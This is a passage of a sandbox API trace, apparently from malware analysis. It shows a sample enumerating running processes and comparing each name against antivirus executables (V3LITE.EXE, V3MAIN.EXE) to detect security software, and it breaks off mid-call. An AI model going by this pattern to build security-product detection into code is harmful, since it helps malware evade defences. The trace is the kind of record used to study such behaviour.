Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="clause_swaziland_complimentary.exe")) returned 1 [0163.280] lstrcpyW (in: lpString1=0x18f6dc, lpString2="clause_swaziland_complimentary.exe" | out: lpString1="clause_swaziland_complimentary.exe") returned="clause_swaziland_complimentary.exe" [0163.280] lstrlenW (lpString="clause_swaziland_complimentary.exe") returned 34 [0163.280] CharUpperBuffW (in: lpsz="clause_swaziland_complimentary.exe", cchLength=0x22 | out: lpsz="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE") returned 0x22 [0163.280] lstrcmpW (lpString1="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE", lpString2="V3LITE.EXE") returned -1 [0163.280] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="ship-loans.exe")) returned 1 [0163.280] lstrcpyW (in: lpString1=0x18f6dc, lpString2="ship-loans.exe" | out: lpString1="ship-loans.exe") returned="ship-loans.exe" [0163.280] lstrlenW (lpString="ship-loans.exe") returned 14 [0163.280] CharUpperBuffW (in: lpsz="ship-loans.exe", cchLength=0xe | out: lpsz="SHIP-LOANS.EXE") returned 0xe [0163.281] lstrcmpW (lpString1="SHIP-LOANS.EXE", lpString2="V3LITE.EXE") returned -1 [0163.281] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="isolation.exe")) returned 1 [0163.281] lstrcpyW (in: lpString1=0x18f6dc, lpString2="isolation.exe" | out: lpString1="isolation.exe") returned="isolation.exe" [0163.281] lstrlenW (lpString="isolation.exe") returned 13 [0163.281] CharUpperBuffW (in: lpsz="isolation.exe", cchLength=0xd | out: lpsz="ISOLATION.EXE") returned 0xd [0163.281] lstrcmpW (lpString1="ISOLATION.EXE", lpString2="V3LITE.EXE") returned -1 [0163.281] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="abc.exe")) returned 1 [0163.283] lstrcpyW (in: lpString1=0x18f6dc, lpString2="abc.exe" | out: lpString1="abc.exe") returned="abc.exe" [0163.283] lstrlenW (lpString="abc.exe") returned 7 [0163.283] CharUpperBuffW (in: lpsz="abc.exe", cchLength=0x7 | out: lpsz="ABC.EXE") returned 0x7 [0163.283] lstrcmpW (lpString1="ABC.EXE", lpString2="V3LITE.EXE") returned -1 [0163.283] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="previous_automation_previously.exe")) returned 1 [0163.284] lstrcpyW (in: lpString1=0x18f6dc, lpString2="previous_automation_previously.exe" | out: lpString1="previous_automation_previously.exe") returned="previous_automation_previously.exe" [0163.284] lstrlenW (lpString="previous_automation_previously.exe") returned 34 [0163.284] CharUpperBuffW (in: lpsz="previous_automation_previously.exe", cchLength=0x22 | out: lpsz="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE") returned 0x22 [0163.284] lstrcmpW (lpString1="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE", lpString2="V3LITE.EXE") returned -1 [0163.284] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="english_performing.exe")) returned 1 [0163.284] lstrcpyW (in: lpString1=0x18f6dc, lpString2="english_performing.exe" | out: lpString1="english_performing.exe") returned="english_performing.exe" [0163.284] lstrlenW (lpString="english_performing.exe") returned 22 [0163.284] CharUpperBuffW (in: lpsz="english_performing.exe", cchLength=0x16 | out: lpsz="ENGLISH_PERFORMING.EXE") returned 0x16 [0163.284] lstrcmpW (lpString1="ENGLISH_PERFORMING.EXE", lpString2="V3LITE.EXE") returned -1 [0163.284] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="laptop-tattoo.exe")) returned 1 [0163.285] lstrcpyW (in: lpString1=0x18f6dc, lpString2="laptop-tattoo.exe" | out: lpString1="laptop-tattoo.exe") returned="laptop-tattoo.exe" [0163.285] lstrlenW (lpString="laptop-tattoo.exe") returned 17 [0163.285] CharUpperBuffW (in: lpsz="laptop-tattoo.exe", cchLength=0x11 | out: lpsz="LAPTOP-TATTOO.EXE") returned 0x11 [0163.285] lstrcmpW (lpString1="LAPTOP-TATTOO.EXE", lpString2="V3LITE.EXE") returned -1 [0163.285] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="c-weird-baskets.exe")) returned 1 [0163.286] lstrcpyW (in: lpString1=0x18f6dc, lpString2="c-weird-baskets.exe" | out: lpString1="c-weird-baskets.exe") returned="c-weird-baskets.exe" [0163.286] lstrlenW (lpString="c-weird-baskets.exe") returned 19 [0163.286] CharUpperBuffW (in: lpsz="c-weird-baskets.exe", cchLength=0x13 | out: lpsz="C-WEIRD-BASKETS.EXE") returned 0x13 [0163.286] lstrcmpW (lpString1="C-WEIRD-BASKETS.EXE", lpString2="V3LITE.EXE") returned -1 [0163.286] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="volume.exe")) returned 1 [0163.287] lstrcpyW (in: lpString1=0x18f6dc, lpString2="volume.exe" | out: lpString1="volume.exe") returned="volume.exe" [0163.287] lstrlenW (lpString="volume.exe") returned 10 [0163.287] CharUpperBuffW (in: lpsz="volume.exe", cchLength=0xa | out: lpsz="VOLUME.EXE") returned 0xa [0163.287] lstrcmpW (lpString1="VOLUME.EXE", lpString2="V3LITE.EXE") returned 1 [0163.287] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="rich-zealand.exe")) returned 1 [0163.287] lstrcpyW (in: lpString1=0x18f6dc, lpString2="rich-zealand.exe" | out: lpString1="rich-zealand.exe") returned="rich-zealand.exe" [0163.287] lstrlenW (lpString="rich-zealand.exe") returned 16 [0163.287] CharUpperBuffW (in: lpsz="rich-zealand.exe", cchLength=0x10 | out: lpsz="RICH-ZEALAND.EXE") returned 0x10 [0163.287] lstrcmpW (lpString1="RICH-ZEALAND.EXE", lpString2="V3LITE.EXE") returned -1 [0163.287] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="objectives-bailey-audit.exe")) returned 1 [0163.288] lstrcpyW (in: lpString1=0x18f6dc, lpString2="objectives-bailey-audit.exe" | out: lpString1="objectives-bailey-audit.exe") returned="objectives-bailey-audit.exe" [0163.288] lstrlenW (lpString="objectives-bailey-audit.exe") returned 27 [0163.288] CharUpperBuffW (in: lpsz="objectives-bailey-audit.exe", cchLength=0x1b | out: lpsz="OBJECTIVES-BAILEY-AUDIT.EXE") returned 0x1b [0163.288] lstrcmpW (lpString1="OBJECTIVES-BAILEY-AUDIT.EXE", lpString2="V3LITE.EXE") returned -1 [0163.288] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="puzzle-fcc-tuesday.exe")) returned 1 [0163.289] lstrcpyW (in: lpString1=0x18f6dc, lpString2="puzzle-fcc-tuesday.exe" | out: lpString1="puzzle-fcc-tuesday.exe") returned="puzzle-fcc-tuesday.exe" [0163.289] lstrlenW (lpString="puzzle-fcc-tuesday.exe") returned 22 [0163.289] CharUpperBuffW (in: lpsz="puzzle-fcc-tuesday.exe", cchLength=0x16 | out: lpsz="PUZZLE-FCC-TUESDAY.EXE") returned 0x16 [0163.289] lstrcmpW (lpString1="PUZZLE-FCC-TUESDAY.EXE", lpString2="V3LITE.EXE") returned -1 [0163.289] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="sayconvenience.exe")) returned 1 [0163.289] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sayconvenience.exe" | out: lpString1="sayconvenience.exe") returned="sayconvenience.exe" [0163.289] lstrlenW (lpString="sayconvenience.exe") returned 18 [0163.289] CharUpperBuffW (in: lpsz="sayconvenience.exe", cchLength=0x12 | out: lpsz="SAYCONVENIENCE.EXE") returned 0x12 [0163.290] lstrcmpW (lpString1="SAYCONVENIENCE.EXE", lpString2="V3LITE.EXE") returned -1 [0163.290] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="psychology-leaving-examinations.exe")) returned 1 [0163.290] lstrcpyW (in: lpString1=0x18f6dc, lpString2="psychology-leaving-examinations.exe" | out: lpString1="psychology-leaving-examinations.exe") returned="psychology-leaving-examinations.exe" [0163.290] lstrlenW (lpString="psychology-leaving-examinations.exe") returned 35 [0163.290] CharUpperBuffW (in: lpsz="psychology-leaving-examinations.exe", cchLength=0x23 | out: lpsz="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE") returned 0x23 [0163.290] lstrcmpW (lpString1="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE", lpString2="V3LITE.EXE") returned -1 [0163.290] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="EXCEL.EXE")) returned 1 [0163.291] lstrcpyW (in: lpString1=0x18f6dc, lpString2="EXCEL.EXE" | out: lpString1="EXCEL.EXE") returned="EXCEL.EXE" [0163.291] lstrlenW (lpString="EXCEL.EXE") returned 9 [0163.291] CharUpperBuffW (in: lpsz="EXCEL.EXE", cchLength=0x9 | out: lpsz="EXCEL.EXE") returned 0x9 [0163.291] lstrcmpW (lpString1="EXCEL.EXE", lpString2="V3LITE.EXE") returned -1 [0163.291] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.292] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.292] lstrlenW (lpString="svchost.exe") returned 11 [0163.292] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.292] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3LITE.EXE") returned -1 [0163.292] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0163.292] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0163.292] lstrlenW (lpString="sppsvc.exe") returned 10 [0163.292] CharUpperBuffW (in: lpsz="sppsvc.exe", cchLength=0xa | out: lpsz="SPPSVC.EXE") returned 0xa [0163.293] lstrcmpW (lpString1="SPPSVC.EXE", lpString2="V3LITE.EXE") returned -1 [0163.293] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0163.293] lstrcpyW (in: lpString1=0x18f6dc, lpString2="OSPPSVC.EXE" | out: lpString1="OSPPSVC.EXE") returned="OSPPSVC.EXE" [0163.293] lstrlenW (lpString="OSPPSVC.EXE") returned 11 [0163.293] CharUpperBuffW (in: lpsz="OSPPSVC.EXE", cchLength=0xb | out: lpsz="OSPPSVC.EXE") returned 0xb [0163.293] lstrcmpW (lpString1="OSPPSVC.EXE", lpString2="V3LITE.EXE") returned -1 [0163.293] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.294] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.294] lstrlenW (lpString="svchost.exe") returned 11 [0163.294] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.294] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3LITE.EXE") returned -1 [0163.294] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.295] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.295] lstrlenW (lpString="svchost.exe") returned 11 [0163.295] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.295] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3LITE.EXE") returned -1 [0163.295] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x890, pcPriClassBase=8, dwFlags=0x0, szExeFile="winpoint.exe")) returned 1 [0163.295] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winpoint.exe" | out: lpString1="winpoint.exe") returned="winpoint.exe" [0163.295] lstrlenW (lpString="winpoint.exe") returned 12 [0163.295] CharUpperBuffW (in: lpsz="winpoint.exe", cchLength=0xc | out: lpsz="WINPOINT.EXE") returned 0xc [0163.296] lstrcmpW (lpString1="WINPOINT.EXE", lpString2="V3LITE.EXE") returned 1 [0163.296] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0163.296] lstrcpyW (in: lpString1=0x18f6dc, lpString2="cmd.exe" | out: lpString1="cmd.exe") returned="cmd.exe" [0163.296] lstrlenW (lpString="cmd.exe") returned 7 [0163.296] CharUpperBuffW (in: lpsz="cmd.exe", cchLength=0x7 | out: lpsz="CMD.EXE") returned 0x7 [0163.296] lstrcmpW (lpString1="CMD.EXE", lpString2="V3LITE.EXE") returned -1 [0163.296] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0163.297] lstrcpyW (in: lpString1=0x18f6dc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0163.297] lstrlenW (lpString="conhost.exe") returned 11 [0163.297] CharUpperBuffW (in: lpsz="conhost.exe", cchLength=0xb | out: lpsz="CONHOST.EXE") returned 0xb [0163.297] lstrcmpW (lpString1="CONHOST.EXE", lpString2="V3LITE.EXE") returned -1 [0163.297] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0163.298] lstrcpyW (in: lpString1=0x18f6dc, lpString2="PING.EXE" | out: lpString1="PING.EXE") returned="PING.EXE" [0163.298] lstrlenW (lpString="PING.EXE") returned 8 [0163.298] CharUpperBuffW (in: lpsz="PING.EXE", cchLength=0x8 | out: lpsz="PING.EXE") returned 0x8 [0163.298] lstrcmpW (lpString1="PING.EXE", lpString2="V3LITE.EXE") returned -1 [0163.298] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 0 [0163.298] CloseHandle (hObject=0xe0) returned 1 [0163.298] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe0 [0163.300] lstrcpyW (in: lpString1=0x18f8e4, lpString2="V3MAIN.EXE" | out: lpString1="V3MAIN.EXE") returned="V3MAIN.EXE" [0163.300] lstrlenW (lpString="V3MAIN.EXE") returned 10 [0163.300] CharUpperBuffW (in: lpsz="V3MAIN.EXE", cchLength=0xa | out: lpsz="V3MAIN.EXE") returned 0xa [0163.300] Process32FirstW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.301] lstrcpyW (in: lpString1=0x18f6dc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0163.301] lstrlenW (lpString="[System Process]") returned 16 [0163.301] CharUpperBuffW (in: lpsz="[System Process]", cchLength=0x10 | out: lpsz="[SYSTEM PROCESS]") returned 0x10 [0163.301] lstrcmpW (lpString1="[SYSTEM PROCESS]", lpString2="V3MAIN.EXE") returned -1 [0163.301] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0163.302] lstrcpyW (in: lpString1=0x18f6dc, lpString2="System" | out: lpString1="System") returned="System" [0163.302] lstrlenW (lpString="System") returned 6 [0163.302] CharUpperBuffW (in: lpsz="System", cchLength=0x6 | out: lpsz="SYSTEM") returned 0x6 [0163.302] lstrcmpW (lpString1="SYSTEM", lpString2="V3MAIN.EXE") returned -1 [0163.302] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0163.302] lstrcpyW (in: lpString1=0x18f6dc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0163.302] lstrlenW (lpString="smss.exe") returned 8 [0163.302] CharUpperBuffW (in: lpsz="smss.exe", cchLength=0x8 | out: lpsz="SMSS.EXE") returned 0x8 [0163.302] lstrcmpW (lpString1="SMSS.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.302] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.303] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.303] lstrlenW (lpString="csrss.exe") returned 9 [0163.303] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0163.303] lstrcmpW (lpString1="CSRSS.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.303] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0163.304] lstrcpyW (in: lpString1=0x18f6dc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0163.304] lstrlenW (lpString="wininit.exe") returned 11 [0163.304] CharUpperBuffW (in: lpsz="wininit.exe", cchLength=0xb | out: lpsz="WININIT.EXE") returned 0xb [0163.304] lstrcmpW (lpString1="WININIT.EXE", lpString2="V3MAIN.EXE") returned 1 [0163.304] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.305] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.305] lstrlenW (lpString="csrss.exe") returned 9 [0163.305] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0163.305] lstrcmpW (lpString1="CSRSS.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.305] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0163.305] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0163.305] lstrlenW (lpString="winlogon.exe") returned 12 [0163.305] CharUpperBuffW (in: lpsz="winlogon.exe", cchLength=0xc | out: lpsz="WINLOGON.EXE") returned 0xc [0163.306] lstrcmpW (lpString1="WINLOGON.EXE", lpString2="V3MAIN.EXE") returned 1 [0163.306] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0163.306] lstrcpyW (in: lpString1=0x18f6dc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0163.306] lstrlenW (lpString="services.exe") returned 12 [0163.306] CharUpperBuffW (in: lpsz="services.exe", cchLength=0xc | out: lpsz="SERVICES.EXE") returned 0xc [0163.306] lstrcmpW (lpString1="SERVICES.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.306] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0163.307] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0163.307] lstrlenW (lpString="lsass.exe") returned 9 [0163.307] CharUpperBuffW (in: lpsz="lsass.exe", cchLength=0x9 | out: lpsz="LSASS.EXE") returned 0x9 [0163.307] lstrcmpW (lpString1="LSASS.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.307] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0163.308] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsm.exe" | out: lpString1="lsm.exe") returned="lsm.exe" [0163.308] lstrlenW (lpString="lsm.exe") returned 7 [0163.308] CharUpperBuffW (in: lpsz="lsm.exe", cchLength=0x7 | out: lpsz="LSM.EXE") returned 0x7 [0163.308] lstrcmpW (lpString1="LSM.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.308] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.309] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.309] lstrlenW (lpString="svchost.exe") returned 11 [0163.309] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.309] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.309] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.309] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.309] lstrlenW (lpString="svchost.exe") returned 11 [0163.309] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.309] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.309] Process32NextW (in: hSnapshot=0xe0, 